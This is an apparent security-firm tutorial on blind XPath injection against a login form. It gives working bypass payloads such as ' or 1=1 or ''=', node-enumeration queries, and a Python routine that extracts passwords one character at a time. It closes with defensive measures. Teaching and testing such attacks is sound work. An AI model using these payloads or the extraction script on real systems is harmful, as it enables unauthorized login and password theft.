Blind XPath Injection – Approach for Unknown Data Sets

by Andrea Hauser
time to read: 12 minutes

Keypoints

Use the extended attack possibilities of XPath injection

  • XPath means XML Path Language
  • XPath is used to query XML documents
  • An XPath Injection is similar to an SQL Injection
  • An XPath Injection allows entire XML documents to be read out

XML Path Language, XPath for short, is a query language for XML documents. It can be used to navigate through the elements and attributes of an XML document. To do this, the XML document is modeled as a tree made up of nodes.

Basic principles

To explain the most important terms, we have provided a simple XML document below; this document forms the basis for the rest of the article.

<?xml version="1.0" encoding="UTF-8"?>
<accounts> <!-- root node -->
    <user id="1"> <!-- node with attribute -->
        <username> <!-- child of user node -->
            1337h4x0r <!-- node value -->
        </username>
        <firstname>Leet</firstname>
        <lastname>Hacker</lastname>
        <email>h@ck.er</email>
        <accounttype>normal</accounttype>
        <password>123456</password>
    </user>
    <user id="2">
        <username>johnnynormal</username>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <email>john@company.com</email>
        <accounttype>administrator</accounttype>
        <password>UiobxmA5UcDVF9m5VAq</password>
    </user>
</accounts>

The XML document shown above corresponds approximately to the following tree:

[Figure: the XML document displayed as a tree]

With XPath, the nodes in an XML document can be selected in various ways. The most important selection options here are:

  • /accounts: Selects the root element accounts. An absolute path starts with /.
  • //user: Selects all nodes with the name 'user'.
  • /accounts/user: Selects all user nodes that are child nodes of the accounts node.
  • /accounts/user[username='1337h4x0r']: Returns the user node that contains the user name 1337h4x0r.
  • //user[email='john@company.com']: Returns the user node that contains the e-mail address john@company.com. A path starting with // selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located.
  • /accounts/child::node(): Selects all child nodes of the accounts node.
  • //user[position()=2]: Selects the user node at position 2. Note: since the index starts at 1, this selects the node of the user johnnynormal.
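
The simpler selection options above can be tried out with Python's standard library. This is a minimal sketch under two assumptions: SAMPLE_XML is a compacted copy of the sample document, and the queries are written relative to the root element because xml.etree.ElementTree supports only a limited subset of XPath (no absolute paths and no functions such as position()).

```python
import xml.etree.ElementTree as ET

# Compacted copy of the sample document (comments and indentation removed).
SAMPLE_XML = (
    "<accounts>"
    '<user id="1"><username>1337h4x0r</username><firstname>Leet</firstname>'
    "<lastname>Hacker</lastname><email>h@ck.er</email>"
    "<accounttype>normal</accounttype><password>123456</password></user>"
    '<user id="2"><username>johnnynormal</username><firstname>John</firstname>'
    "<lastname>Doe</lastname><email>john@company.com</email>"
    "<accounttype>administrator</accounttype>"
    "<password>UiobxmA5UcDVF9m5VAq</password></user>"
    "</accounts>"
)

root = ET.fromstring(SAMPLE_XML)  # root is the <accounts> element

# Counterpart of //user: all user nodes anywhere below the root.
all_users = root.findall(".//user")

# Counterpart of /accounts/user[username='1337h4x0r'].
by_name = root.find("user[username='1337h4x0r']")

# Counterpart of //user[email='john@company.com'].
by_email = root.find(".//user[email='john@company.com']")

# Counterpart of //user[position()=2]; positions start at 1.
second_user = root.find("user[2]")

print(len(all_users), by_name.get("id"), by_email.get("id"),
      second_user.findtext("username"))
```

A full XPath 1.0 engine is needed for the injection strings later in the article, since they rely on or, substring() and position().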

Blind XPath Injection

Now that we have covered the most important basics of XML Path Language, I will provide step-by-step instructions for how to approach a Blind XPath Injection. Our example is based on a login screen. The goal is to bypass this login screen and ultimately read out all users' passwords.

Finding the Vulnerability

To find out whether an XPath Injection is possible at all, an apostrophe ' or a quotation mark " can be entered as the first character in the user name field. In the best-case scenario, one of these characters triggers an error message that looks something like this:

Warning: SimpleXMLElement::xpath(): Invalid predicate in /webserver/index.php on line 56

Warning: SimpleXMLElement::xpath(): xmlXPathEval: evaluation failed in /webserver/index.php on line 56

If this message or something similar appears, user input is reaching an XPath query unfiltered, which confirms that an XPath Injection is the right approach here.
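
Checking a response for such messages can be scripted. The sketch below only inspects a response body that has already been fetched. The marker strings are taken from the sample messages above; the names PROBE_CHARACTERS, XPATH_ERROR_MARKERS and looks_like_xpath_error are illustrative assumptions, and other XPath libraries will produce different messages.

```python
# Characters to submit as the first character of the user name field.
PROBE_CHARACTERS = ("'", '"')

# Substrings taken from the PHP/libxml2 sample messages in this article.
XPATH_ERROR_MARKERS = (
    "SimpleXMLElement::xpath()",
    "Invalid predicate",
    "xmlXPathEval",
)


def looks_like_xpath_error(response_body: str) -> bool:
    """Return True if the response contains a known XPath error marker."""
    return any(marker in response_body for marker in XPATH_ERROR_MARKERS)
```

If no error text is shown, the absence of a marker proves nothing: the application may simply suppress warnings.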

Preparing for the Injection

In general, an XPath Injection uses a similar principle to an SQL injection. The point is to change an existing XPath query in such a way that it has the effect desired by the attacker.

Fortunately for the attacker, and unlike with SQL databases, no access controls can be implemented within an XML document. Consequently, a successful XPath Injection allows the entire XML document to be read out.

Furthermore, XPath is a standardized query language, so there are no different XPath dialects to deal with. Only the different XPath versions need to be taken into account. At the moment, XPath 3.1 is the most current version. To determine the XPath version in use, call a function that was introduced in version 2.0 or 3.1 and did not exist in the preceding version. If an error message states that this function does not exist, you can assume that you are dealing with an older XPath version.

In our example, I use the function lower-case("ABC"), which was introduced in version 2.0, to check the XPath version. Since the error messages below are output in our example, it can be concluded that XPath 1.0 is being used.

Warning: SimpleXMLElement::xpath(): xmlXPathCompOpEval: function lower-case not found in /webserver/index.php on line 56

Warning: SimpleXMLElement::xpath(): Unregistered function in /webserver/index.php on line 56

Warning: SimpleXMLElement::xpath(): Stack usage error in /webserver/index.php on line 56

Warning: SimpleXMLElement::xpath(): xmlXPathEval: 1 object left on the stack in /webserver/index.php on line 56
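
The version check can be sketched as follows. The article does not state the exact input used for the probe, so VERSION_PROBE is a hypothetical payload, and infer_xpath_version is an illustrative helper that only looks for the "function lower-case not found" text from the messages above.

```python
# Hypothetical probe for the user name field; it calls lower-case(), which
# exists from XPath 2.0 onward. The exact payload is an assumption.
VERSION_PROBE = "' or lower-case(\"ABC\")=\"abc\" or ''='"


def infer_xpath_version(response_body: str) -> str:
    """Guess the XPath version from the response to VERSION_PROBE."""
    if "function lower-case not found" in response_body:
        return "1.0"
    # No error: either the function exists or errors are not displayed.
    return "2.0 or later, or errors are hidden"
```

The second return value is deliberately vague, because a missing error message does not prove that the function was evaluated.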

The XPath counterpart to the SQL Injection expression ' OR '1'='1 is ' or 1=1 or ''='. In a query of the form 'bool_value_1 and bool_value_2', such as username='...' and password='...', this input ensures that the result no longer depends on bool_value_2, that is, on the check password='...'.

Our example includes the input fields User name and Password. We enter the value ' or 1=1 or ''=' as the user name and the value bla as the password. If we assume the server logic below:

simplexml_load_file("useraccounts.xml")->xpath("/accounts/user[username='" . $_POST["username"] . "' and password='" . $_POST["password"] . "']");

the following XPath query is created:

xpath("/accounts/user[username='' or 1=1 or ''='' and password='bla']")

Because and binds more tightly than or in XPath, the predicate is evaluated as username='' or 1=1 or (''='' and password='bla'). Since 1=1 is always true, the predicate is true for every user node and the password check no longer matters. The changed XPath query therefore returns all users, and because the application uses the first user from this result, we are logged in as the first user of the XML document.
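
The string concatenation and the resulting evaluation can be reproduced in a few lines. This is a sketch, not the server code: build_query is a hypothetical stand-in for the PHP concatenation and assumes that no extra whitespace is placed around the submitted values. Python's or/and have the same relative precedence as in XPath, so a plain boolean expression can mirror the predicate.

```python
def build_query(username: str, password: str) -> str:
    """Hypothetical stand-in for the PHP string concatenation."""
    return ("/accounts/user[username='" + username
            + "' and password='" + password + "']")


injected = build_query("' or 1=1 or ''='", "bla")
print(injected)

# The predicate groups as: A or B or (C and D).
username_is_empty = False            # username='' is false for both sample users
always_true = (1 == 1)               # the injected 1=1
empty_equals_empty = ("" == "")      # the injected ''=''
password_is_bla = False              # no sample user has the password 'bla'

predicate = (username_is_empty or always_true
             or empty_equals_empty and password_is_bla)
print(predicate)
```

Replacing always_true with False makes the predicate depend on the password check again, which is exactly the switch that the blind injection uses.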

Implementing the Attack

We have now reached a state that permits a Boolean-based Blind Injection. We can replace the first or-operand (1=1) with a condition of our own. If we are still logged in as the first user after this change, the condition evaluated to true; if the login fails, it evaluated to false.

To continue this example in a logical manner, we assume that we can determine the password of the XML document’s first user. To do this, we can either change the password once we are logged in, or we could read it out from the user interface of the profile for the user who is logged in. Thus, for the rest of this example we assume that we know the password to be 123456.

Since we assume that the XML document has an unknown structure, the first task is to determine the node where the password is saved. Knowing this position within a user element is essential because we can only brute-force an unknown password if we know where to find it. This is where the known password of the first user helps.

I would now like to go through each step in the first or-query, which we need for the Blind XPath Injection:

  1. //user[position()=1]: This reads out the user who is in first place in the XML document. We should note here that the node name ‘user’ is a justified assumption. If we do not get any hits using this assumption, other terms similar to ‘user’ should be used.
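  2. (//user[position()=1]/child::node()[position()=1]): The aim of this query is to read out the first child node of the first user. Applied to our sample XML document, this would be the username node. Note that node() also matches text and comment nodes, so this assumes that the parser does not keep the whitespace between elements as separate text nodes; child::* would select element nodes only.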
  3. substring((//user[position()=1]/child::node()[position()=1]),1): Substring is defined as string substring(string_to_work_with, start_of_substring_extraction, [optional_length_of_extracted_string]). Applied to our sample XML, this means that the string is read out from the username node. Since no length is specified, the entire string 1337h4x0r is read out. Note: in XPath, the index starts at 1, not at 0 as is otherwise customary in IT.
  4. substring((//user[position()=1]/child::node()[position()=1]),1)="123456": After the value of the first user's first child node has been read out (1337h4x0r), this value is compared to 123456. In this case, the comparison evaluates to false. If this expression is used in place of 1=1 in the query ' or 1=1 or ''=', the login fails. We can then conclude that the first child node of the user is not the password. To achieve a login in our sample XML, the query ' or substring((//user[position()=1]/child::node()[position()=6]),1)="123456" or ''=' is needed. This tells us that the password is in position 6 within the user node.
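
The four steps above can be composed programmatically. The sketch below only builds the input strings for the user name field; position_probe is an illustrative helper name, and the upper bound of 10 child positions is an arbitrary assumption.

```python
def position_probe(user: int, child: int, known_value: str) -> str:
    """Build the user name input that tests one child position."""
    step1 = f"//user[position()={user}]"                     # select the user
    step2 = f"({step1}/child::node()[position()={child}])"   # select one child
    step3 = f"substring({step2},1)"                          # read its string value
    step4 = f'{step3}="{known_value}"'                       # compare to known value
    return f"' or {step4} or ''='"


# One candidate per child position of the first user, using the known password.
candidates = [position_probe(1, child, "123456") for child in range(1, 11)]
print(candidates[5])
```

Each candidate is submitted in turn; the one that leads to a successful login reveals the position of the password node.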

Since we now know the position of the password, we can easily adjust the query to: ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="a" or ''='. This queries the first character of the password for the second user and compares that character with the letter 'a'. We manage this by specifying in the substring query how many characters from the start position are to be returned. Since we do not get a successful login with a comparison to 'a', we can conclude that the password of the second user does not start with a. It is not until we use ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="U" or ''=' that we are successfully logged in as the first user of the XML document again. So, the first character of the password is the letter 'U'.

The only thing left to do is to increment the position of the selected substring and compare the characters again. ' or substring((//user[position()=2]/child::node()[position()=6]),2,1)="i" or ''=' gets us our second hit.

This type of comparison can be automated relatively easily, so readers are free to research this themselves if they so wish.
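
One way to automate the comparison is sketched below. To keep the example self-contained, the HTTP login request is replaced by simulated_oracle, a stand-in that answers the probes from a copy of the sample data; in a real test this function would submit the payload as the user name and report whether the login succeeded. All function names, the CHARSET and the max_length limit are assumptions made for illustration.

```python
import re
import string
from typing import Callable

CHARSET = string.ascii_letters + string.digits  # assumed password alphabet


def char_probe(user: int, child: int, index: int, guess: str) -> str:
    """Build the user name input that tests one character of one node."""
    return (f"' or substring((//user[position()={user}]"
            f"/child::node()[position()={child}]),{index},1)=\"{guess}\" or ''='")


def extract_value(oracle: Callable[[str], bool], user: int, child: int,
                  max_length: int = 64) -> str:
    """Recover a node value character by character via a true/false oracle."""
    recovered = ""
    for index in range(1, max_length + 1):  # XPath string indices start at 1
        match = next((c for c in CHARSET
                      if oracle(char_probe(user, child, index, c))), None)
        if match is None:
            break  # end of string, or a character outside CHARSET
        recovered += match
    return recovered


# Simulated oracle: stands in for "was the login successful?".
SAMPLE_USERS = [
    ["1337h4x0r", "Leet", "Hacker", "h@ck.er", "normal", "123456"],
    ["johnnynormal", "John", "Doe", "john@company.com", "administrator",
     "UiobxmA5UcDVF9m5VAq"],
]
PROBE_RE = re.compile(
    r'position\(\)=(\d+)\]/child::node\(\)\[position\(\)=(\d+)\]\),(\d+),1\)="(.)"')


def simulated_oracle(payload: str) -> bool:
    found = PROBE_RE.search(payload)
    if found is None:
        return False
    user, child, index = (int(group) for group in found.groups()[:3])
    value = SAMPLE_USERS[user - 1][child - 1]
    return value[index - 1:index] == found.group(4)


print(extract_value(simulated_oracle, user=2, child=6))
```

The loop stops at the first position where no candidate matches, so a value containing characters outside CHARSET is returned truncated; widening the alphabet trades completeness against the number of requests.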

Protective Measures

To prevent an XPath Injection, pre-compiled XPath queries should be used if at all possible. If the selected library does not support these, a parameterized XPath interface should be used. If neither of these options is possible and a user's input has to be embedded in a dynamic XPath query, the user input must be escaped. When escaping values, whitelisting approaches should be used wherever possible.
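
A whitelisting check for the last case could look like the sketch below. The allowed character set and the length limit are assumptions that would have to be adapted to the application, and validate_xpath_input is an illustrative name rather than a library function.

```python
import re

# Assumed allow list: letters, digits and a few characters common in user
# names and e-mail addresses. Quotes, brackets and spaces are not allowed.
ALLOWED_INPUT = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def validate_xpath_input(value: str) -> str:
    """Return the value unchanged if it matches the allow list, else raise."""
    if not ALLOWED_INPUT.fullmatch(value):
        raise ValueError("input contains characters outside the allow list")
    return value


print(validate_xpath_input("johnnynormal"))
```

Because neither ' nor " passes the check, the injection strings used in this article are rejected before they reach the query.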

Closing Remarks

In conclusion, I would like to note that this article focused solely on XPath 1.0. Compared to versions 2.0 and 3.1, XPath 1.0 has only a few functions, so reading out XML documents requires a large number of queries. XPath 2.0 and 3.1 added many functions that simplify reading out XML documents, thus broadening the reach of an XPath Injection. For example, the function doc(path_to_xml_document) was added in XPath 2.0 and allows users to reference, and as a result read out, other XML documents. This makes it possible to read out config files stored at known locations, for instance.

About the Author

Andrea Hauser

Andrea Hauser graduated with a Bachelor of Science FHO in information technology at the University of Applied Sciences Rapperswil. She is focusing her offensive work on web application security testing and the realization of social engineering campaigns. Her research focus is creating and analyzing deepfakes. (ORCID 0000-0002-5161-8658)
